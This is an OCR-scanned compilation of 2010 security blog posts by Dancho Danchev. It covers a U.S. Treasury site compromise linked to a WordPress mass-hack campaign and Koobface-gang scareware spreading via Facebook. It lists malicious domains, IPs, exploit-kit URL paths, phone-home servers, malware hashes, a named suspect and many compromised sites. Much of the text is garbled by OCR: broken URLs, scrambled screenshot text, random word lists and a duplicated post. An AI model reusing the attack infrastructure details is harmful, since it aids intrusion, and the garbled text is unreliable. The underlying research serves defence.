6. http: //dancnev. blogspot con/2010/04/dns~infrastructure-of-woney-mile. ha 

7 icep//aeater wlopense tee S0l0/ tae niecaenseee st mane ele nea 

8. http: //dancnev.blogspet con/2010/04/dissecting-vordpress-blogs~compronise Hal 


9. http: //www.wpsecuritylock.com/cechriecom-com-script-wordpress—hacked-on-godaddy-case-study/ 


10, 
11. 

12. 

13. http://ddanchev. blogspot .com/2010/04/keeping-money-mule-recruiters-on-short.htm 

14. 
15. http://ddanchev. blogspot .com/2009/12/diverse-portfolio-of-fake-security.htm 

16. 
17. 


18. http://blog.taragana. com/index. php/archive/20-wordpress-security-plug-ins-and-tips-to-keep-hackers-away/ 


19. http://www. problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/ 


20. http://speckyboy . com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/ 
21. http://ddanchev.blogspot.com/ 
22. http://twitter .com/danchodanche 


6.4.15 Summarizing Zero Day’s Posts for April (2010-04-29 14:09) 


Home News & Blogs Videos White Papers Downloads Reviews Popular - 


Ryan Naraine and Dancho Danchev 


ZDWet Must Reed 
Java zero-day flaw under active attack 
just days after Google researcher Tavis Ormandy released detais on a 


damperous mew Java vulnerabdity, makcous hackers have pounced and are 
exploding the flaw in the wid to launch drive-by ontnued + 


Merosott | United 
Cornenunications 


————— ey 


April 28th, 2010 
How to remove the ICPP Copyright 
Violation Alert ransomware 


1Q Memager Uninstall: Completed 


& ice 
8 SORERRRRRRRERRER ERROR Eee eeeeee 


« 


Dewees _< Con) 


Who would have thought that on your way to remove 3 ransomware scam 
that affected your PC, you weadd be one day perating the appicaton that 


See for yourself how 
seamless you can make }> 
your communications. 4 


ee 


Sponsored Links 


Vulnerability Database 

Vuineraddty 
database and alerting solution. Try 
Ps 


SQL Injection Tutorial 
Watch Our 
Step-by-Step Guide To SQt 


Irgectron 


Recent Entries 


Expert advice on 
emrvations in 
heakhcare and the 
Oreen technologes 
that make & 
happen. 
Find out more 


‘Senart Business 


pi 
Crsaussion and 
advice on 
management 
issues that revolve 
around malang 
your workd smarter 
and more usefs 


More Smart Advice 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for April, 2010. You 
[2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS 
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feed, [5]Zero Day’s main feed, or follow me on Twitter: 


Recommended reading: [6]Attack of the Opt-In Botnets; [7]Hundreds of high profile sites 
unprotected from domain hijacking and [8]Copyright violation alert ransomware in the wild 


01. [9]Facebook phishing campaign serving ZeuS crimeware 

02. [10]Researchers expose complex cyber espionage network 

03. [11]Copyright violation alert ransomware in the wild 

04. [12]Do teens hack? Survey says 1 in 6 do 

05. [13]Google: Scareware accounts for 15 percent of all malware 

06. [14]New Mac OS X malware variant spotted 

07. [15]Hundreds of high profile sites unprotected from domain hijacking 
08. [16]Report: ZeuS crimeware kit, malicious PDFs drive growth of cybercrime 
09. [17]Attack of the Opt-In Botnets 

10. [18]1.5 million Facebook accounts offered for sale - FAQ 

11. [19]How to remove the ICPP Copyright Violation Alert ransomware 


This post has been reproduced from [20]Dancho Danchev’s blog. 
[21]on Twitter. 


; 
. http: //ddanchev. blogspot .com/2010/03/summarizing-zero-days-posts-for.html 
. http: //updates.zdnet .com/tags/danchotdanchev.html?t=0&és=00=1&mode=rss 


. http: //blogs.zdnet .com/security/?p=6248 
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?p=6042 
11. : : : ?p= 
12. http://blogs.zdnet .com/security/?p=6148 
13. http://blogs.zdnet .com/security/?p=6176 
14. 
15. http://blogs.zdnet .com/security/?p=6248 
16. 
17 
18. 
19. http://blogs.zdnet .com/security/?p=6329 
20. 
2. 
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Follow him 


6.5 May 


6.5.1 U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass Word- 
Press Blogs Compromise (2010-05-04 22:56) 


UPDATED: Saturday, May 08, 2010: 5 new domains have been introduced by the same gang, 
once again parked at 217.23.14.14, AS49981, WorldStream. 


jumpsearches.com - 217.23.14.14 - Email: alex1978a@bigmir.net 
ingeniosearch.net - 217.23.14.14 - Email: alex1978a@bigmir.net 
searchnations.com - 217.23.14.14 - Email: alex1978a@bigmir.net 
mainssearch.com - 217.23.14.14 - Email: alex1978a@bigmir.net 
bigsearchinc.com - 217.23.14.14 - Email: alex1978a@bigmir.net 


Sample exploitation structure: 
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- jumpsearches.com/bing.com /load.php?spl=mdac 

- jumpsearches.com/bing.com /error.js.php 

- jumpsearches.com/bing.com /pdf.php 

- jumpsearches.com/bing.com /?spl=2 &br=MSIE &vers=7.0 &s= 
- jumpsearches.com/bing.com /load.php?spl=pdf 2030 

- jumpsearches.com/bing.com /load.php?spl=MS09-002 


UPDATED: Thursday, May 06, 2010: The cybercriminals behind this ongoing campaign 
continue introducing new domains - all of which are currently in a cover-up phrase pointing to 
127.0.0.1 - over the past 24 hours. What’s particularly interesting, is that all of them reside 
within AS49981, WorldStream = Transit Imports = -CAIW-, Netherlands. 


- twceorps.com/tv/ - 217.23.14.15 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 

- [L]JMD5: ebcfaa2f595ccea81176f6f125b31ac7 

- jobsatdoor.com/plain/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 

- [2]MD5: ebcfaa2f595ccea81176f6f125b31ac7 

- oficla.com/plain/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 

- [3]MD5: ebcfaa2f595ccea81176f6f125b31ac7 

- organization-b.com/mail/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 
- dilingdiling.com/router/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 


All the samples phone back to mazcostrol.com/inst.php?aid=blackout now responding to 
95.143.193.61, AS49770, SERVERCONNECT-AS ServerConnect Sweden AB, from the previ- 
ously known IP 188.124.16.134. 


mazcostrol.com is not just a phone back location. It’s also actively serving client-side 
exploits. Sample update obtained from the same domain: 
- update4303.exe - [4]Trojan.Win32.VBKrypt - Result: 5/41 (12.2 %) 


Not surprisingly, AS44565 and AS49770 where mazcostrol.com was hosted, are also the 
home of currently active ZeuS crimeware C &Cs. 


[5]AS49770 (SERVERCONNECT-AS ServerConnect Sweden AB) 
brunongino.com 

slavenkad.com 

frondircass.cn 

pradsuyz.cn 


[6]AS44565 (VITAL VITAL TEKNOLOJI) 
spacebuxer.com 

odboe.info 

212.252.32.69 

jokersimson.net 

whoismak.net 

188.124.7.247 

www. bumagajet.net 

barmatuxa.info 

barmatuxa.net 


UPDATED: A researcher just pinged me with details on something that | should be flat- 
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tered with. Apparently grepad.com /in.cgi?4 redirects to 217.23.14.14 /in _t.php which then 
[7]redirects to my Blogger profile. 


In fact, 217.23.14.14 the IP of the client-side exploit serving domains also redirects there, with 
the actual campaign in a cover-up phrase, with the original domain now responding 127.0.0.1. 


Let’s see for how long, until then, [8]The Beatles - You Know My Name seems to be the 
appropriate music choice. 


[9JAVG and PandaLabs are reporting that the web sites of [10]the U.S. Bureau of Engraving 
and Printing (bep.treas.gov; moneyfactory.gov) are serving client-side vulnerabilities that 
ultimately expose the visitor to scareware ([11]The Ultimate Guide to Scareware Protection). 


What’s particularly interesting about this campaign is that, it’s part of last month’s Net- 
workSolutions mass WordPress blogs compromise, in the sense that not only is the iFrame-d 
domain registered using the same email as the client-side exploits serving domains from 
the NetworkSolutions campaign - alex1978a@bigmir.net - but also, the dropped scareware’s 
phone back location - mazcostrol.com/inst.php?aid=blackout - 188.124.16.134 - Email: 
alex1978a@bigmir.net - is identical to the one used in the same campaign, including the 
affiliate ID used by the original cybercriminal. 


The client-side exploit serving domain used in the the U.S Treasury site compromise, 
has also been [12]reported by a large number of NetworkSolutions customers in the most 
recent campaign affecting WordPress blogs. 


The exploit-serving structure, including the detection rates for the dropped scareware 
and exploits used in the U.S Treasury compromise campaign, is as follows: 


- grepad.com /in.cgi?3 - 188.124.16.133, AS44565, VITAL TEKNOLOJI - Email: 
alex1978a@bigmir.net 

- thejustb.com /just/ - 217.23.14.14 (dyndon.com), AS49981 - Email: alex1978a@bigmir.net 

- thejustb.com /just/pdf.php 

- thejustb.com /just/1.pdf 

- thejustb.com /just/load.php?spl=javas 

- thejustb.com /just/jl _893d.jar 

- thejustb.com /just/j2 _079.jar 
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- L.pdf - [13]Exploit.PDF-JS.Gen (v) - Result: 1/41 (2.44 %) 

- jl _893d.jar - [14]Trojan-Downloader:Java/Agent.DJDN - Result: 5/41 (12.20 %) 

- j2 _079.jar - [15]EXP/Java.CVE-2009-3867.C.2; Exploit. Java.Agent.a - Result: 9/41 (21.96 %) 
- grepad.exe - [16]Trojan.Generic.KD.10339; a variant of Win32/Injector.BNG - Result: 8/41 
(19.51 %) 
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Upon successful exploitation the dropped grepad.exe, phones back to to maz- 
costrol.com/inst.php?aid=blackout - 188.124.16.134, AS44565, VITAL TEKNOLOJI - Email: 
alex1978a@bigmir.net, with the same phone back location also used in the [17]NetworkSolu- 
tions mass compromise campaign. 


Known MD5’s used by the same campaigner from previous campaigns, phoning back to 
the same domain+identical affiliate ID: 

MD5=4734162bb33eff7af7e18243821b397e 

MD5=1c9cele5f4c2f3ec1791554a349bf456 

MD5=d11d76c6ecf6a9a87dcd510294104a66 

MD5=c33750c553e6d6bdc7dac6886f65b51d 

MD5=74cdadfb15181a997b15083f033644d0 

MD5=3c7d8cdc73197edd176167cd069878bd 


Attempting to 
iot." message 


interact with the campaign’s directories often results in a "nice try, id- 
. Lovely! 


Related posts: 
[18]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 
[19]Dissecting the WordPress Blogs Compromise at Network Solutions 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
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[21]on Twitter. 


1. ttp://www.virustotal.com/analisis/84d634a8c825c089313fa1036c1be3274f54f 3c0964f3602de63352c39cab9c1-12731 


2. jtep: //uww.vizustotal.con/analisis/S4d634a8c®25c0B03194a1096clbeS27AfbAiSc096a"6024¢69952<30cab9eI~12790 
3. htep: aww. vizustotal.con/analisis/e4d634a8c®25c0B03194a1096clbeS274fbaiac096at602ae69952<20cab9eI-12790 
4. http://www. virustotal .com/analisis/b2842a1a395aa627c30bb3313d6027 2558e5a2a0ab553a4fd3bb9ca60f323020- 12731 


9. http: //thompson.blog.avg.com/2010/05/treasury-website-hacked. htm 


10. http://pandalabs .pandasecurity.com/usa-treasury-website-hacked-using-exploit-kit/ 


11. http://blogs.zdnet .com/security/?p=429 

12. http://blog.sucuri.net/2010/05/new- infections-today-at-network.htm 

13. https://www.virustotal.com/analisis/ed8f5cbe78fffe7481a33cba8161c93724c3cf64552a2b13c781901b23£ 965fb- 12 
14. https://www.virustotal.com/analisis/50de5fc37f46e868c1ef43c2cd2b2b05d5af 6390c2f 3d6bbc£8d19145abfdfaf-12 
15. https://www.virustotal.com/analisis/6bb42ed29360f 32a5e44404bb97de7 efb7069090d835f cab9daf fd97ed73b15c-12 


16. http: //www.virustotal.com/analisis/84d634a8c825c089313fa1036c1be3274f54f3c0964f3602de63352c39cab9c1-12730 
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. http://ddanchev. blogspot .com/2010/04/dissecting-wordpress-blogs- compromise .htm 
. http://ddanchev. blogspot .com/2010/04/godaddys-mass-wordpress-blogs .htm 


. http://ddanchev. blogspot .com/ 


. http://twitter.com/danchodanche 


7 
8 
19. http://ddanchev. blogspot .com/2010/04/dissecting-wordpress-blogs- compromise .htm 
0 
1 


6.5.2 U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass Word- 
Press Blogs Compromise (2010-05-04 22:56) 
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UPDATED: Saturday, May 08, 2010: 5 new domains have been introduced by the same gang, 
once again parked at 217.23.14.14, AS49981, WorldStream. 


jumpsearches.com - 217.23.14.14 - Email: alex1978a@bigmir.net 
ingeniosearch.net - 217.23.14.14 - Email: alex1978a@bigmir.net 
searchnations.com - 217.23.14.14 - Email: alex1978a@bigmir.net 
mainssearch.com - 217.23.14.14 - Email: alex1978a@bigmir.net 


bigsearchinc.com - 217.23.14.14 - Email: alex1978a@bigmir.net 
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Sample exploitation structure: 

- jumpsearches.com/bing.com /load.php?spl=mdac 

- jumpsearches.com/bing.com /error.js.php 

- jumpsearches.com/bing.com /pdf.php 

- jumpsearches.com/bing.com /?spl=2 &br=MSIE &vers=7.0 &s= 
- jumpsearches.com/bing.com /load.php?spl=pdf 2030 


- jumpsearches.com/bing.com /load.php?spl=MS09-002 


UPDATED: Thursday, May 06, 2010: The cybercriminals behind this ongoing campaign 
continue introducing new domains - all of which are currently in a cover-up phrase pointing to 
127.0.0.1 - over the past 24 hours. What’s particularly interesting, is that all of them reside 
within AS49981, WorldStream = Transit Imports = -CAIW-, Netherlands. 


- twcorps.com/tv/ - 217.23.14.15 - Email: alexl1978a@bigmir.net, Prokopenko Aleksey 


- [L]MD5: ebcfaa2f595ccea81176f6f125b31ac7 


- jobsatdoor.com/plain/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Alek- 
sey 


- [2]MD5: ebcfaa2f595ccea81176f6f125b31ac7 
- oficla.com/plain/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 
- [3]MD5: ebcfaa2f595ccea81176f6f125b31ac7 


- organization-b.com/mail/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko 
Aleksey 


- dilingdiling.com/router/ - 217.23.14.14 - Email: alex1978a@bigmir.net, Prokopenko Aleksey 


All the samples phone back to mazcostrol.com/inst.php?aid=blackout now responding to 
95.143.193.61, AS49770, SERVERCONNECT-AS ServerConnect Sweden AB, from the previ- 
ously known IP 188.124.16.134. 
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mazcostrol.com is not just a phone back location. It’s also actively serving client-side 
exploits. Sample update obtained from the same domain: 


- update4303.exe - [4]Trojan.Win32.VBKrypt - Result: 5/41 (12.2 %) 


Not surprisingly, AS44565 and AS49770 where mazcostrol.com was hosted, are also the 
home of currently active ZeuS crimeware C &Cs. 


[5]AS49770 (SERVERCONNECT-AS ServerConnect Sweden AB) 
brunongino.com 

slavenkad.com 

frondircass.cn 


pradsuyz.cn 


[6]AS44565 (VITAL VITAL TEKNOLO]I) 
Spacebuxer.com 

odboe.info 

212.252.32.69 

jokersimson.net 

whoismak.net 

188.124.7.247 

www.bumagajet.net 

barmatuxa.info 


barmatuxa.net 


UPDATED: A researcher just pinged me with details on something that | should be flat- 
tered with. Apparently grepad.com /in.cgi?4 redirects to 217.23.14.14 /in _t.php which then 
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[7]redirects to my Blogger profile. 


In fact, 217.23.14.14 the IP of the client-side exploit serving domains also redirects there, with 
the actual campaign in a cover-up phrase, with the original domain now responding 127.0.0.1. 


Let’s see for how long, until then, [8]The Beatles - You Know My Name seems to be the 
appropriate music choice. 


text/hin 


[9JAVG and PandaLabs are reporting that the web sites of [10]the U.S. Bureau of Engraving 
and Printing (bep.treas.gov; moneyfactory.gov) are serving client-side vulnerabilities that 
ultimately expose the visitor to scareware ([11]The Ultimate Guide to Scareware Protection). 


What’s particularly interesting about this campaign is that, it’s part of last month’s Net- 
workSolutions mass WordPress blogs compromise, in the sense that not only is the iFrame-d 
domain registered using the same email as the client-side exploits serving domains from 
the NetworkSolutions campaign - alex1978a@bigmir.net - but also, the dropped scareware’s 
phone back location - mazcostrol.com/inst.php?aid=blackout - 188.124.16.134 - Email: 
alex1978a@bigmir.net - is identical to the one used in the same campaign, including the 
affiliate ID used by the original cybercriminal. 


The client-side exploit serving domain used in the the U.S Treasury site compromise, 
has also been [12]reported by a large number of NetworkSolutions customers in the most 
recent campaign affecting WordPress blogs. 
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The exploit-serving structure, including the detection rates for the dropped scareware 
and exploits used in the U.S Treasury compromise campaign, is as follows: 


- grepad.com /in.cgi?3 - 188.124.16.133, AS44565, VITAL TEKNOLOJI - Email: 
alex1978a@bigmir.net 


- thejustb.com /just/ - 217.23.14.14 (dyndon.com), AS49981 - Email: alex1978a@bigmir.net 
- thejustb.com /just/pdf.php 

- thejustb.com /just/1.pdf 

- thejustb.com /just/load.php?spl=javas 

- thejustb.com /just/jl _893d.jar 


- thejustb.com /just/j2 _079.jar 


- L.pdf - [13]Exploit.PDF-JS.Gen (v) - Result: 1/41 (2.44 %) 
- jl _893d.jar - [14]Trojan-Downloader:Java/Agent.DJDN - Result: 5/41 (12.20 %) 


- j2 _079.jar - [15]EXP/Java.CVE-2009-3867.C.2; Exploit.Java.Agent.a - Result: 9/41 (21.96 
%) 


- grepad.exe - [16]Trojan.Generic.KD.10339; a variant of Win32/Injector.BNG - Result: 8/41 
(19.51 %) 
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Upon successful exploitation the dropped grepad.exe, phones back to to maz- 
costrol.com/inst.php?aid=blackout - 188.124.16.134, AS44565, VITAL TEKNOLOJI - Email: 
alex1978a@bigmir.net, with the same phone back location also used in the [17]NetworkSolu- 
tions mass compromise campaign. 


Known MD5’s used by the same campaigner from previous campaigns, phoning back to 
the same domain+identical affiliate ID: 


MD5=4734162bb33eff7af7e18243821b397e 
MD5=1c9cele5f4c2f3ec1791554a349bf456 
MD5=d11d76c6ecf6a9a87dcd510294104a66 
MD5=c33750c553e6d6bdc7dac6886f65b51d 
MD5=74cdadfb15181a997b15083f033644d0 


MD5=3c7d8cdc73197edd176167cd069878bd 


Attempting to interact with the campaign’s directories often results in a "nice try, id- 
jot." message. Lovely! 
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Related posts: 
[18]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 


[19]Dissecting the WordPress Blogs Compromise at Network Solutions 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
[21]on Twitter. 


i. ttp://www.virustotal.com/analisis/84d634a8c825c089313fa1036c1be3274f 54f 3c0964f 3602de63352c39cab9c1- 12731 


2, http://www. virustotal, con/analisis/84d684a8c806c000013fai086c1be8074iS4i9c0964F36028668952-88cab8c1- 12780 
3, http://www. virust oval, con/analisis/84d684a8c806c000013fa1086c1bo3074iS4i9c0964f36028668962-98cab0c1- 12780 
4. http://www. virustotal. com/analisis/b2842a1a395aa627c30bb3313d60272558e5a2a0ab553a4fd3bb9ca60F323020- 12731 
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5 
6 
7. http://www blogger . com/profile/09989733095447891258 
8. http: //wuw. youtube . com/watch?v=9DkaRUtp3w8 

9. http: //thompson. blog. avg. com/2010/05/treasury-website-hacked htm] 


10. http: //pandalabs.pandasecurity.com/usa-treasury-website-hacked-using-exploit-kit/ 


11. http://blogs.zdnet.com/security/?p=429 

12. http://blog.sucuri.net/2010/05/new-infections-today-at-network.htm 

13. ttps://www.virustotal .com/analisis/ed8f5cbe78fffe7481a33cba8161c93724c3cf64552a2b13c781901b23£965f b- 12 
4. ttps://www.virustotal.com/analisis/50de5fc37f£46e868c1lef43c2cd2b2b05d5af6390c2f 3d6bbcf8d19145abfdfaf-12 
ttps://www.virustotal.com/analisis/6bb42ed29360f32a5e44404bb97 de7 ef b7069090d835f cab9daffd97ed73b15c-12 


6. http: //www.virustotal.com/analisis/84d634a8c825c089313fa1036c1be3274f 54f 3c0964f 3602de63352c39cab9c1- 12730 
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6.5.3 From the Koobface Gang with Scareware Serving Compromised Sites 
(2010-05-08 20:46) 


1K 


t) My Network Places 


, Windows Web Security 
diy te 


te remove them 
ra) My Documents 


oO Shared Cocuments 


Oo Control Panel 


Name Type Threat level 

@ wi2mmdsJ0em vy Nedum # Soyware 6 softeare, whe) Can gather informaton from user's computer 

@ Magic OVD Ripper us rend Trought Intemet connection and send them to its eater. Gather 
information can be passwords, e-mail adresses and al Tat Geta, whch is 

© Trojee Norse Generict 1.09) s ah Sy 

@ wi2vahasomm 7 Critical 

@ Stteurz50 s He a 

Recommend: Cck “Start Protecton” button to erase al treats Start Protector 


Following last month’s "[1]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign" 
Koobface gang coverage, it’s time to summarize some of their botnet spreading activities, 
from the last couple of days. 


Immediately after the suspension of their automatically registered Blogspot accounts, 
the gang once again proved that it has contingency plans in place, and started pushing links 
to compromises sites, in a combination with an interesting "visual social engineering trick", 
across Facebook, which sadly works pretty well, in the sense that it completely undermines 
the "don’t click on links pointing to unknown sites" type of security tips. 


« Recommended reading: [2] 10 things you didn’t know about the Koobface gang 


The diverse set of activities courtesy of the Koobface gang - consider going through the 
related posts in order to understand their underground multitasking mentality beyond the 
Koobface botnet itself - are a case study on the abuse of legitimate infrastructure with clean 
IP/AS reputation, for purely malicious purposes. 


x 


This active use of the "trusted reputation chain", just like the majority of social engineering 
centered tactics of the gang, aim to exploit the ubiquitous weak link in the face of the average 
Internet user. Here’s an example of the most recent campaign. 


The spreading of fully working links such as the following ones across Facebook: 
facebook.com/I/6e7e5;bit.ly/9QjjSk 
facebook.com/I/cdfb;bit.ly/9QjjSk 
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facebook.com/I/f3c29;bit.ly/9QjjSk 


adorable beacon caricature overpowering point-blank poison rally ram waste 


Traffic 


Clicks Referrers Locations 


Clicks) 2 
(Blom) 


aims to trick the infected user’s friends, that this is a Facebook.com related link. Clicking on 
this link inside Facebook leads to the "Be careful" window showing just the bit.ly redirector, to 
finally redirect to 198.65.28.86/swamt/ where a Koobface bogus video has already been seen 
by 2,601 users which have already clicked on the link. 


The scareware redirectors/actual serving domains are parked at 195.5.161.126, [3]AS31252, 
STARNET-AS StarNet Moldova: 

1lnasa-test.com - Email: test@now.net.cn 
lonline-test.com - Email: test@now.net.cn 
lwww2scanner.com - Email: test@now.net.cn 
2a-scanner.com - Email: test@now.net.cn 
2nasa-test.com - Email: test@now.net.cn 
2online-test.com - Email: test@now.net.cn 
2www2scanner.com - Email: test@now.net.cn 
3a-scanner.com - Email: test@now.net.cn 
3nasa-test.com - Email: test@now.net.cn 
3online-test.com - Email: test@now.net.cn 
3www2scanner.com - Email: test@now.net.cn 
4a-scanner.com - Email: test@now.net.cn 
4check-computer.com - Email: test@now.net.cn 
4nasa-test.com - Email: test@now.net.cn 
4online-test.com - Email: test@now.net.cn 
4www2scanner.com - Email: test@now.net.cn 
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5a-scanner.com - Email: test@now.net.cn 
5nasa-test.com - Email: test@now.net.cn 
5online-test.com - Email: test@now.net.cn 
6a-scanner.com - Email: test@now.net.cn 
defence-status6.com - Email: test@now.net.cn 
defence-status7.com - Email: test@now.net.cn 
mega-scan2.com - Email: test@now.net.cn 
protection-status2.com - Email: test@now.net.cn 
protection-status4.com - Email: test@now.net.cn 
protection-status6.com - Email: test@now.net.cn 
security-statusl.com - Email: test@now.net.cn 
security-status3.com - Email: test@now.net.cn 
security-status4.com - Email: test@now.net.cn 
security-status6.com - Email: test@now.net.cn 
securitystatus7.com - Email: test@now.net.cn 
securitystatus8.com - Email: test@now.net.cn 
securitystatus9.com - Email: test@now.net.cn 
security-status9.com - Email: test@now.net.cn 


among devoton feat furcee gentle mconsolable mhubded senility 


conspacaous downhearted farewell badey migghng pronounced reflection scheol-book shirk sped 


breeze bruiser chew condition impolite limit luscious shatter smelly success talk wastrel 


hhacks helping berror lament 


ee assertion certain dianfec 


calamity dominion exactly halfwit hurt maroon mine pleasure politics resignation sicken 
strong tarty temporal trophy 


Detection rates: 

- setup.exe - [4]Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08 %) 

- RunAV _312s2.exe - [5]VirTool.Win32.Obfuscator.hg!b (v); High Risk Cloaked Malware - Result: 
4/41 (9.76 %) 


The scareware sample phones back to: 

- windows32-sys.com/download/winlogo.bmp - 91.213.157.104, AS13618 CARONET-ASN - 
Email: contact@privacy-protect.cn 

- sysdilupdates.com/?b=312s2 - 87.98.134.197, AS16276, OVH Paris - Email: contact@privacy- 
protect.cn 


The complete list of compromised sites distributed by Koobface-infected Facebook users: 
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02f32e3.netsolhost.com /0492dc/ 
abskupina.si /cclq/ 
adi-agencement.fr /8r2twm/ 
agilitypower.dk /ko2/ 
aguasdomondego.com /d5yodi/ 
alabasta.homeip.net /e8/ 
alankaye.info /2cgg/ 
alpenhaus.com.ar /al5zvf5/ 
animationstjo.fr /5c/ 
artwork.drayton.co.uk /k5wz/ 
beachfishingwa.org.au /u8g98ai/ 
bildtuben.se /I9jg/ 

chalet.se /srb/ 

charlepoeng.be /i0twbt/ 
christchurchgastonia.org /Lhkq/ 
chunkbait.com /gb4i6ak/ 
cityangered.se /besttube/ 
clarkecasa.net /rhk6/ 
clrdsfm.mb.ca /2964/ 
codeditor.awardspace.biz /uncensoredclip/ 
coloridellavita.com /sc/ 

cpvs.org /6eobhOn/ 
danieletranchita.com /yourvids/ 
dennis-leah.zzl.org /m95/ 
doctorsorchestra.com /qw/ 
dueciliguria.it /zircu/ 
ediltermo.com /p4zhvj0/ 
emmedici.net /2pg46mk/ 
eurobaustoff.marketing-generator.de /52649an/ 


euskorock.es /p4zm/ 
explicitflavour.freeiz.com /qk3r/ 
f9phx.net /svr/ 

fatucci.it /l04s8m2/ 
forwardmarchministries.org /lbc/ 
fotoplanet.it /bnog6s/ 
frenchbean.co.uk /zwr/ 
furius.comoj.com /1azl/ 
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geve.be /oj4ex4/ 
gite-maison-pyrenees-luchon.com /jox/ 
googleffffffffa0ac4d9f.omicronrecords.com /me/ 
gosin.be /ist63z/ 

grimslovsms.se /cutetube/ 
guest.worldviewproduction.com /m2f/ 
hanssen-racing.com /j15/ 

helpbt.com /nqo40uq/ 
helpdroid.omicronrecords.com /7h/ 
hoganjobs.com /jrepsp/ 

holustravel.cz /5j5/ 

hoperidge.com /fltwizy/ 
hottesttomato.com /6b/ 
iglesiabetanial.com /7y7/ 

ihostu.co.uk /jic9v/ 
ilterrazzoallaveneziana.it /4vxaq5/ 
integratek.omicronrecords.com /to4u2bd/ 
irisjard.o2switch.net /Ib/ 
islandmusicexport.com /hbi2ut9/ 
isteinaudi.it /h2a/ 

johnphelan.com /uynv4/ 


jsacm.com /z6/ 

kabchicago.info /1cgko/ 
katia-paliotti.com /Obaktz/ 
kennethom.net /120/ 
kleppcc.com /aliendemonstration/ 
klimentglass.cz /vwalp/ 
kvarteretekorren.se /60/ 
lanavabadajoz.com /cg/ 
langstoncorp.com /02072c/ 
libermann.phpnet.org /madu8p/ 
lineapapel.com /8120up/ 
longting.nl /6ch/ 
mainteck-fr.com /qjbo5v/ 
majesticdance.com /v1lg/ 
mia-nilsson.se /cmc/ 
microstart.fr /Izu1/ 

migdal.org.il /y952eo/ 
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mindbodyandsolemt.com /pnbn/ 
musicomm.ca /a5z/ 

nassnig.org /z1/ 

neweed.org /x4t/ 
nosneezes.com /5hjkdjo/ 
nottinghamdowns.com /m7ec/ 
nutman-group.com /92m/ 
omicronsystems.inc.md /eho0/ 
on3la.be /bgfhclg/ 
onlineadmin.net /b7uccx/ 
ornskoldskatten.se /m1u/ 
oxhalsobygg.se /amaizingmovies/ 


« Recommended reading: [6]Dissecting Koobface Gang’s Latest Facebook Spreading Cam- 
paign 


partenaires-particuliers.fr /uo/ 
pegasolavoro.it /316/ 
peteknightdays.com /40k4/ 
pheromoneforum.org /ds/ 
pilatescenter.se /bgx8e/ 
plymouth-tuc.org.uk /xhaq/ 
popeur.fr /m7yaw/ 
pro-du-bio.com /af6xtp/ 
prousaudio.com /4isg/ 
puertohurraco.org /q3algz/ 
radioluz900am.com /3i993/ 
reporsenna.netsons.org /zvz/ 
rhigar.nu /6v/ 
richmondpowerboat.com /tifax5/ 
rmg360.co.cc /22i/ 
roninwines.com /wonderfulvids/ 
rrmaps.com /j60/ 

rvl.it /bv6k/ 
scarlett-oharas.com /my0333/ 
secure.tourinrome.org /qyp/ 
servicehandlaren.se /yq9ahw0/ 
servicehandlaren.spel-service.com /q9q115/ 
sgottnerivers.com /yOj16rw/ 
shofarcall.com /zi/ 
sirius-expedition.com /x4yab/ 
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<html> 
heed. 
<title>Loading</title> 
meta names"robots” 


sicsc.co.uk /Okem/ 

soderback.eu /xvg9/ 
spel-service.com /xm/ 
sporthal.msolutions.be /vyx3yu/ 
steelstoneind.com /yzp/ 
stgeorgesteel.com /ji/ 
stgeorgesteel.com /ylnwir/ 
stubbieholderking.com /dyarx1/ 
sweet-peasdog.se /Orcjo/ 
taekwondovelden.nl /mhnskk/ 
testjustin.comze.com /oafxzy/ 
the-beehive.com /r8x3cm/ 
the-beehive.com /weqw7e/ 
thedallestransmission.com /rjsg2/ 
therealmagnets.comuv.com /3wn19n/ 
thestrategicfrog.110mb.com /66vv/ 
tizianozanella.it/ k2cei/ 
trustonecorp.com /mabmpp/ 
unna.nu /6lie/ 
uroloki.omicronrecords.com /9t/ 
vaxjoff.com /4fpu/ 

veerle-frank.be /101/ 

verdiverdi.net /3tt/ 
visionministerial.com /p191/ 
waffotis.se /yufi3u/ 
watsonspipingandheating.com /krda/ 
welplandeast.com /6q/ 
WESTCOASTPERFORMANCECOATINGS.COM /1tw4/ 
williamarias.us /na9mq/ 
woodworksbyjamie.com /90mrjb/ 
wowparis2000.com /rtsz/ 
yin-art.be /a75ble/ 
youniverse.site50.net /4a9r/ 


Due to the diversity of its cybercrime operations, the Koobface gang is always worth 
keeping an eye on. Best of all - it’s done semi-automatically these days. 


The best is yet to come, stay tuned! 


Related Koobface gang/botnet research: 
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[7]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[8]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[9]10 things you didn’t know about the Koobface gang 

[10]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
[11]How the Koobface Gang Monetizes Mac OS X Traffic 

[12]The Koobface Gang Wishes the Industry "Happy Holidays" 
[13]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[14]Koobface Botnet Starts Serving Client-Side Exploits 

[15]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[16]Koobface Botnet’s Scareware Business Model - Part Two 

[17]Koobface Botnet’s Scareware Business Model - Part One 

[18]Koobface Botnet Redirects Facebook’s IP Space to my Blog 

[19]New Koobface campaign spoofs Adobe’s Flash updater 

[20]Social engineering tactics of the Koobface botnet 

